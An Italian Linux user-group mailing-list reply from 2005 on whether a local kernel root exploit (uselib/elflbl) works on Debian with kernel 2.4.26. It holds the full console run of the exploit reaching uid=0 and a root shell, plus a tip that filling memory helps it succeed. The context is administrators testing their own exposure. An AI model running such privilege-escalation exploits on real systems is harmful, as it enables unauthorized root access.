Re: [Erlug] Local linux root exploit

[Andrea Scrimieri [Permanent Link]]

On Mon, 10 Jan 2005, Maurizio Lemmo - Tannoiser wrote:

> * lunedì 10 gennaio 2005, alle 01:35, Andrea Scrimieri scrive:
> > Da me vulnerabile anche sid. Attenzione che quell'errore non vuol dire
> > che il sistema non e' vulnerabile, ma solo che l'exploit in quella
> > circostanza non ha funzionato.
> Avendo io tentato diverse volte in quella combinazione, tenderei ad
> escludere l'accoppiata libc6 (piu` che definire la release) 2.3.2 e
> 2.4.26 stock debian.
>
> Avro` tentato una 20ina di volte, anche tentando qualche switch. Il
> massimo che ottengo, in quella combinazione, e`:
>
> [-] FAILED: uselib (Cannot allocate memory)
>
> (il che non esclude, eh).

andrea@mordicchio:~$ uname -a
Linux mordicchio 2.4.26-1-686 #1 Tue Aug 24 13:46:05 JST 2004 i686 GNU/Linux

andrea@mordicchio:~$ dpkg -l libc6 |grep libc6
ii  libc6          2.3.2.ds1-20   GNU C Library: Shared libraries and Timezone

andrea@mordicchio:~$ ./elflbl

[+] SLAB cleanup
    child 1 VMAs 65527
    child 2 VMAs 65527
    child 3 VMAs 65527
    child 4 VMAs 65527
    child 5 VMAs 65527
    child 6 VMAs 65527
    child 7 VMAs 65527
    child 8 VMAs 65527
    child 9 VMAs 65527
    child 10 VMAs 65527
    child 11 VMAs 49125
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xdf800000 - 0xfeee1000
    Wait... /
[+] race won maps=60528
    expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xe07e1000
[+] gate modified ( 0xffec93bd 0x0804ec00 )
[+] exploited, uid=0

sh-3.00#

L'esito dell'exploit cambia a seconda della memoria occupata e 
di applicazioni ne ho dovute lanciare un bel po' (circa 370 MB di 
memoria usata). HTH
Ciao,
Andrea